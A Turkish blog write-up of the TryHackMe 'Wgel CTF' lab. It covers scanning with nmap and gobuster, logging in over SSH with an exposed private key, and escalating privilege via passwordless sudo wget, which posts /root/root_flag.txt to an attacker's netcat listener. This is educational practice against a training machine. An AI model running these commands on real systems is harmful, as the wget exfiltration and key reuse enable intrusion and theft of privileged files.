Walkthrough

[TR] TryHackMe Wgel CTF Writeup

Reklam

[TR] TryHackMe Wgel CTF Writeup

Merhaba bu makalemizde tryhackme’de bulunan Wgel CTF isimli odayı hep beraber çözeceğiz, başlayalım.

İlk önce agresif bir nmap taraması yapıyoruz, nmap ağ hakkında aktif bilgi toplayabileceğimiz bir bilgi toplama aracıdır.

namp -A 10.10.213.167

nmap
nmap

2 adet açık bağlantı noktamız var, biri 80 diğeri ise 22 numaralı bağlantı noktası. 80 numaralı bağlantı noktasında bir adet web sitesi ayakta, 22 numaralı bağlantı noktasında ise ssh servisi ayakta. Biz herkese açık olduğu için webden yürüyelim, dizinleri aramak için gobuster isimli aracı kullanabiliriz.

gobuster dir -u http://10.10.213.167/ -w common.txt

gobuster
gobuster

1 adet dizin bulduk, sitemap dizininde fazla bir şey bulamıyoruz bu yüzden sitemap dizinine de bir adet dizin taraması yapıyoruz.

gobuster dir -u http://10.10.213.167/sitemap -w common.txt

Ve evet! bir adet ssh anahtarı bulduk.

gobuster2
gobuster2

bununla birlikte oturum açabiliriz ama bize bir kullanıcı ismi lazım bunun için sitenin kaynak koduna baktığımızda şöyle bir metin görüyoruz.

<!– Jessie don’t forget to udate the webiste –>

kaynakkod
kaynakkod

Bu metinden yola çıkarak kullanıcın isminin “Jessie” olduğunu anlıyoruz, şimdi ssh’a bağlanacağız. Bağlanmadan önce id_rsa dosyasına belirli izinler tanımlamamız gerekli, aşağıdaki şekilde tanımlayabiliriz.

chmod 600 id_rsa

Şimdi ssh’a bağlanalım.

ssh -i id_rsa [email protected]

Ve evet içerideyiz!

ssh
ssh

İçerideki dizinleri biraz araştırdığımızda kullanıcı bayrağının doküman dizininde olduğunu görüyoruz, bayrağı okumak için cat veya less araçlarını kullanabiliriz. Neyse bayrağa bakalım.

cd Documents

cat user_flag.txt

less user_flag.txt (alternatif)

user_flag.txt
user_flag.txt

Şimdi yetkimizi yükseltmemiz gerekli, bunun için ilk önce nerelerin yönetici yetkisine ihtiyaç duyduğuna bakmalıyız, aşağıdaki komutu kullanabiliriz.

sudo -l

sudo-l
sudo-l

Komutun çıktısına baktığımızda /usr/bin/wget adresinde şifresiz bir şekilde yönetici olabileceğimizi görüyoruz, bunu istismar edebiliriz. İstismar etmek için detaylı kaynak olarak burayı kullanabilirsiniz: https://www.hackingarticles.in/linux-for-pentester-wget-privilege-escalation/ . Şimdi orada verilen komutu girerek makinemizi istismar edelim.

İlk önce netcat ile kendi bilgisayarımızı dinlemeye almalıyız.

nc -lvnp 5050

Şimdi karşı makinede şu komutu girelim, ip adresi yazılan kısıma tryhackme’nin size tanımladığı ip’yi girmelisiniz.

sudo /usr/bin/wget –post-file=/root/root_flag.txt 10.9.30.197:5050

Flag

Burada wget dizinini kullandığımızdan dolayı yönetici izni alırken makine bizden şifre istemedi, şimdi netcat ile dinleme yaptığımız terminal sekmesine gidip bize herhangi bir tepki vermiş mi? diye bir bakalım. Evet vermiş! yönetici bayrağımızın değeri karşımızda, bayrağı girip makineyi bitirelim.

root_flag.txt
root_flag.txt

Daha fazla içerik için sitemizi takip edebilirsiniz!

https://pwnlab.me/category/walkthrough/

Reklam
Reklam

Eren Yılmaz

Ben Eren, kendimce zararlı yazılım analizi ile uğraşıyorum.

İlgili Makaleler

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Başa dön tuşu